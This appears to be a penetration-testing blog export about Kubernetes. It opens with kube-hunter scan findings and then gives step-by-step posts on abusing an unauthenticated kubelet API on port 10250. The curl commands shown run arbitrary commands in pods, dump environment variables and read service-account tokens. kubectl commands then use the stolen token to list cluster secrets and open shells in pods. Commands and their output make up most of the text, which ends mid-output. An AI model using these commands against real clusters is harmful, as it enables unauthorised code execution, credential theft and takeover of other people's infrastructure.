<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | cluster. |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| API Server | 1.2.3.4:443 | The API server is in |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | charge of all |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | operations on the |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | cluster. |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">Vulnerabilities</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:2379 | Unauthenticated | Etcd is accessible | Etcd is accessible | {"etcdserver":"2.3.8 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Access | using insecure | using HTTP (without | ","etcdcluster":"2.3 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | connection (HTTP) | authorization and | ... |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | authentication), it | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | would allow a | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | potential attacker | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | to | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | gain access to | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | the etcd | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:2379 | Information | Etcd Remote version | Remote version | {"etcdserver":"2.3.8 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | disclosure | disclosure might | ","etcdcluster":"2.3 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | give an attacker a | ... |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | valuable data to | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | attack a cluster | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10255 | Information | K8s Version | The kubernetes | v1.5.6-rc17 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | Disclosure | version could be | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | obtained from logs | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | in the /metrics | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | endpoint | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10255 | Information | Exposed Pods | An attacker could | count: 68 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | | view sensitive | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | information about | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | pods that are bound | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | to a Node using the | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | /pods endpoint | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10255 | Information | Cluster Health | By accessing the | status: ok |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | Disclosure | open /healthz | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | handler, an attacker | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | could get the | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | cluster health state | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | without | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | authenticating | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:2379 | Access Risk | Etcd Remote Read | Remote read access | {"action":"get","nod |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | Access Event | might expose to an | e":{"dir":true,"node |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | attacker cluster's | ... |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | possible exploits, | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | secrets and more. | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10255 | Access Risk | Privileged Container | A Privileged | pod: node-exporter- |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | container exist on a | 1fmd9-z9685, |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | node. could expose | containe... |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | the node/cluster to | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | unwanted root | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | operations | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-62341815384208253412019-01-16T09:00:00.001-05:002019-01-16T09:00:15.423-05:00Kubernetes: unauth kublet API 10250 token theft & kubectlKubernetes: unauthenticated kublet API (10250) token theft & kubectl access & exec<br />
<br />
<br />
kube-hunter output to get us started:
<script src="https://gist.github.com/carnal0wnage/c88e15a99e37b4d090afb77cb56cc4c2.js"></script>
<br />
<br />
do a <span style="font-family: "courier new" , "courier" , monospace;">curl -s https://k8-node:10250/runningpods/ </span>to get a list of running pods<br />
<br />
With that data, you can craft your post request to exec within a pod so we can poke around.<br />
<br />
Example request:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"</span><br />
<br />
Output:<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">total 35264</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 .</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenv</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Nov 9 16:27 bin</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 5 root root 380 Nov 9 16:27 dev</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nanny</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 etc</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jan 9 2018 home</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 5 root root 4096 Nov 9 16:27 lib</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 5 root root 4096 Nov 9 16:27 media</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jan 9 2018 mnt</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dr-xr-xr-x 134 root root 0 Nov 9 16:27 proc</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwx------ 2 root root 4096 Jan 9 2018 root</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jan 9 2018 run</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Nov 9 16:27 sbin</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jan 9 2018 srv</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxrwxrwt 1 root root 4096 Nov 9 17:00 tmp</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 7 root root 4096 Nov 9 16:27 usr</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 var</span><br />
<br />
Check the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:<br />
1. the mounted folder<br />
2. the cloud metadata url<br />
<br />
Check the env with the following command:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlws7mpWg0AT9kdBP9uOZB9QnLNu3WsL0IRKPziCnusV33ddS2AQzsp4SEf-NoRHpTgjruoP2yTCCHTkubAt4wIgMU3c2CcIHWI7j3bUcKVx7LuKGAIrNdpO25g2h-0WeQfirZctEp6pg/s1600/Screen+Shot+2019-01-09+at+3.42.09+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="422" data-original-width="1234" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlws7mpWg0AT9kdBP9uOZB9QnLNu3WsL0IRKPziCnusV33ddS2AQzsp4SEf-NoRHpTgjruoP2yTCCHTkubAt4wIgMU3c2CcIHWI7j3bUcKVx7LuKGAIrNdpO25g2h-0WeQfirZctEp6pg/s400/Screen+Shot+2019-01-09+at+3.42.09+PM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
KUBERNETES_PORT=tcp://10.10.10.10:443</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
or</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
KUBERNETES_MASTER_NAME: 10.11.12.13:443</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them. This may be (if we are lucky) another public IP or a 10. IP. If it's a 10. IP we need to download kubectl to the pod.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Assuming it's not in the environment variables let's look and see if they are there in the mounted secrets</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq"</span><span style="font-family: "courier new" , "courier" , monospace;"> -d "cmd=mount"</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;">sample output truncated:</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: inherit;">We can then cat out the ca.cert, namespace, and token</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq"</span><span style="font-family: "courier new" , "courier" , monospace;"> -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: inherit;">Output:</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">total 4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxrwxrwt 3 root root 140 Nov 9 16:27 .</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 3 root root 4.0K Nov 9 16:27 ..</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">lrwxrwxrwx 1 root root 13 Nov 9 16:27 ca.crt -> ..data/ca.crt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">lrwxrwxrwx 1 root root 16 Nov 9 16:27 namespace -> ..data/namespace</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">lrwxrwxrwx 1 root root 12 Nov 9 16:27 token -> ..data/token</span></div>
<br />
and then:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: inherit;">output:</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">eyJhbGciOiJSUzI1NiI---SNIP---</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: inherit;">Also grab the ca.crt :-)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
With the token, ca.crt and api server IP address we can issue commands with kubectl.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=</span><span style="font-family: "courier new" , "courier" , monospace;">eyJhbGciOiJSUzI1NiI---SNIP---</span><span style="font-family: "courier new" , "courier" , monospace;"> get pods --all-namespaces</span><br />
<br />
Output:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">NAMESPACE NAME READY STATUS RESTARTS AGE</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system event-exporter-v0.1.9-5c-SNIP 2/2 Running 2 120d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system fluentd-cloud-logging-gke-eeme-api-default-pool 1/1 Running 1 2y</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system heapster-v1.5.2-5-SNIP 3/3 Running 0 27d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system kube-dns-5b8-SNIP 4/4 Running 0 61d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system kube-dns-autoscaler-2-SNIP 1/1 Running 1 252d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system kube-proxy-gke-eeme-api-default-pool 1/1 Running 1 2y </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system kubernetes-dashboard-7-SNIP 1/1 Running 0 27d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system l7-default-backend-10-SNIP 1/1 Running 0 27d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system metrics-server-v0.2.1-7-SNIP 2/2 Running 0 120d</span><br />
<br />
at this point you can pull secrets or exec into any available pods<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=</span><span style="font-family: "courier new" , "courier" , monospace;">eyJhbGciOiJSUzI1NiI---SNIP---</span><span style="font-family: "courier new" , "courier" , monospace;"> get secrets --all-namespaces</span><br />
<br />
to get a shell via kubectl<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=</span><span style="font-family: "courier new" , "courier" , monospace;">eyJhbGciOiJSUzI1NiI---SNIP---</span><span style="font-family: "courier new" , "courier" , monospace;"> get pods --namespace=kube-system</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">NAME READY STATUS RESTARTS AGE</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">event-exporter-v0.1.9-5-SNIP 2/2 Running 2 120d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">--SNIP--</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>metrics-server-v0.2.1-7f8ee58c8f-ab13f</b> 2/2 Running 0 120d</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl </span><span style="font-family: "courier new" , "courier" , monospace;">exec -it metrics-server-v0.2.1-7f8ee58c8f-</span><span style="font-family: "courier new" , "courier" , monospace;">ab13f</span><span style="font-family: "courier new" , "courier" , monospace;"> --namespace=kube-system</span><span style="font-family: "courier new" , "courier" , monospace;">--server=https://1.2.3.4 --certificate-authority=ca.crt --token=</span><span style="font-family: "courier new" , "courier" , monospace;">eyJhbGciOiJSUzI1NiI---SNIP---</span><span style="font-family: "courier new" , "courier" , monospace;"> /bin/sh</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/ # ls -lah</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">total 40220</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Sep 11 07:25 .</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Sep 11 07:25 ..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">-rwxr-xr-x 1 root root 0 Sep 11 07:25 .dockerenv</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 3 root root 4.0K Sep 11 07:25 apiserver.local.config</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 12.0K Sep 11 07:24 bin</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 5 root root 380 Sep 11 07:25 dev</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Sep 11 07:25 etc</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 nobody nogroup 4.0K Nov 1 2017 home</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">-rwxr-xr-x 2 root root 39.2M Dec 20 2017 metrics-server</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dr-xr-xr-x 135 root root 0 Sep 11 07:25 proc</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Dec 19 21:33 root</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxrwxrwt 1 root root 4.0K Oct 18 13:57 tmp</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 3 root root 4.0K Sep 11 07:24 usr</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Sep 11 07:25 var</span><br />
<br />
For completeness if you got the keys via the environment variables the kubectl command would be something like this:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt </span><span style="font-family: "courier new" , "courier" , monospace;">--client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-81432658178776215412019-01-16T09:00:00.000-05:002019-01-16T09:00:16.939-05:00Kubernetes: unauth kublet API 10250 basic code execUnauth API access (10250)<br />
<br />
Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.<br />
<br />
<br />
<div>
<div>
Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"># /run/%namespace%/%pod_name%/%container_name%</span></div>
<div>
<br /></div>
<div>
example:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">total 12</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 13 root root 148 Aug 26 11:31 .</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 13 root root 148 Aug 26 11:31 ..</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">-rwxr-xr-x 1 root root 0 Aug 26 11:31 .dockerenv</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 8192 May 5 22:22 bin</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 380 Aug 26 11:31 dev</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 3 root root 135 Aug 26 11:31 etc</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 nobody nogroup 6 Mar 18 16:38 home</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 6 Apr 23 11:17 lib</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">dr-xr-xr-x 353 root root 0 Aug 26 07:14 proc</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 6 Mar 18 16:38 root</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">dr-xr-xr-x 13 root root 0 Aug 26 15:12 sys</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxrwxrwt 2 root root 6 Mar 18 16:38 tmp</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 4 root root 31 Apr 23 11:17 usr</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 41 Aug 26 11:31 var</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Here is how to get all secrets which container uses (environment variables - commons to see kublet tokens here):</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/<podname>/<container-name>" -d "cmd=env"</container-name></podname></span></div>
<div>
<br /></div>
<div>
The list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool</span></div>
<div>
<br /></div>
<div>
or</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl --insecure https://k8s-node-1:10250/runningpods | jq</span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
Example 1:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl --insecure https://1.2.3.4:10250/runningpods | jq</span></div>
<div>
<br /></div>
<div>
Output:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)</span></div>
<div>
<br /></div>
<div>
Example 2:</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl --insecure https://1.2.3.4:10250/runningpods | jq</span></div>
<div>
<br /></div>
<div>
Output:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Unauthorized</span></div>
<div>
<br /></div>
<div>
Example 3:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl --insecure https://1.2.3.4:10250/runningpods | jq</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Output:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">{</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "kind": "PodList",</span></div>
<div>
